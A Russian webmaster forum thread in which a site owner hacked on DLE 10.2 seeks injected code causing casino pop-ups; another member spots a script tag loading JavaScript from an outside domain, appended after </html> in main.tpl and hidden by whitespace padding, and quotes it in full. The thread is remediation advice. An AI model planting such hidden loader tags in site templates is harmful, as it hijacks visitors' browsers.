Как найти шпиона на сайте
Страницы: 1
Как найти шпиона на сайте, Взломали сайт на DLE 10.2
Сайт был взломан, причем, обнаружил только взлом админки, глубже не рыл. Доступ восстановил, больше в админпалели никто не роется, но проблема осталась.Куда-то запихнули шпиона и теперь при клике мышкой открывается второе окно с сайтом про какое-то казино.  

Движок DLE ставили спецы с хостинга сами (они нет-нет предлагают обновиться бесплатно), я ничего не менял. Всегда работало хорошо, только после взлома осталась одна проблема.

Подскажите, где искать гадский код?
Изменено: Юрий Д - 26 Января 2017 14:06
"ПисАть, как и пИсать, нужно, когда уже не можешь" М.М. Жванецкий.

Награды СССР
Цитата
Юрий Д пишет:
Сайт был взломан, причем, обнаружил только взлом админки, глубже не рыл. Доступ восстановил, больше в админпалели никто не роется, но проблема осталась.Куда-то запихнули шпиона и теперь при клике мышкой открывается второе окно с сайтом про какое-то казино.

Движок DLE ставили спецы с хостинга сами (они нет-нет предлагают обновиться бесплатно), я ничего не менял. Всегда работало хорошо, только после взлома осталась одна проблема.

Подскажите, где искать гадский код?
Сделайте откат
WGN, откат, не получается, те бэкапы, которые сохранились, все уже с вредоносным кодом...

Поискал шпиона методом тыка: при замене файла main.tpl в шаблонах на чистый файл из дистрибутива, проблема исчезает - получается, что код в нём.
Но вот, найти не смог... Перерыл весь файл, ничего подозрительного не нашел.

Как хоть он должен выглядеть? Может кто-нибудь пример покажет?
можно адрес сайта?
vik1105, адрес у меня в подписи, нижний
в самом низу после </html> что это за скрипт? если не Ваш, то это он.
Цитата
<script async language="javascript" charset="UTF-8" type="text/javascript" src="rohlita.ru/6xj87m86pzm80kdafh1kb96pn3lgyehco6puieccrnf990zunmuv76h?6b42bbis=aDcbi ( rohlita.ru/6xj87m86pzm80kdafh1kb96pn3lgyehco6puieccrnf990zunmuv76h?6b42bbis=aDcbi )"></script>
vik1105, да, похоже, что это он и есть...
Изменено: Юрий Д - 27 Января 2017 13:59
удалите этот скрипт, и поставьте на будущее antishell.ru/]AntiShell Скрипт он будет контролировать все действия на сайте.
Всё, проблема устранена! ))) Код был замаскирован большим количеством пробелов. поэтому в окне редактирования и не был виден.
Всем огромное спасибо за помощь! Отдельный респект vik1105!
Этой маскировке три тысячи лет, но до сих пор работает )
Цитата
Юрий Д пишет:
Всё, проблема устранена!
возможно ненадолго, советую сменить все пароли от сайтов и хостинга проверить комп на троянов, могут заливать на хостинге
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
07:00 01.02. Апдейт 31.01 // Chrome готовит "чёрную метку" для ИИ? 
03:47 SEO под нейро 
01:59 Трафик пробил дно? Худший январь за 10 лет и внезапный рост продаж с Bing 
01:18 Если в таблице эксель есть формулы, как можно экспортировать такую таблицу в HTML, что бы все формулы были активными на сайте? 
01:11 Индексирование страниц в Яндексе 
00:23 Дзен окончательно всё? Или у кого-то еще «стреляет» белый контент? 
00:07 Яндекс туда же: "Нейро" отжал 50% первого экрана. Органический трафик падает 
21:37 - Вечные ссылки с трастовых сайтов 2024 проверен FastTrust 
14:30 Продам аккаунты Gmail USA IP | Gmail MIX IP | Outlook Old 
12:00 CryptoGraph — Анонимный обмен криптовалют без KYC и AML 
08:47 Мониторинг обменников Сrypto-scout.io 
23:58 A-Parser 1.1 - продвинутый парсер поисковых систем, Suggest, PR, DMOZ, Whois, etc 
20:43 BestX24 - быстрый и безопасный обменник криптовалют и электронных денежных средств 
18:29 Nexulume.com Обменник без AML и KYC 
01:05 Точные прогнозы на футбол 
00:49 Список обновленных тем пуст... 
00:20 Gartner обещал смерть SEO к 2026 году. Открываем метрику и проверяем 
00:11 Осталось 3-5 месяцев до блокировки YouTube в России, — заявил Клименко 
20:11 Ставки на супер тренды в спорте 
06:57 блокировка youtube 2026: ркн начинает «выдавливание». кто уже пробовал вк видео? 
15:18 Win 10: Три месяца без обновлений. Как полёт? // Переезд на Win 11 или Linux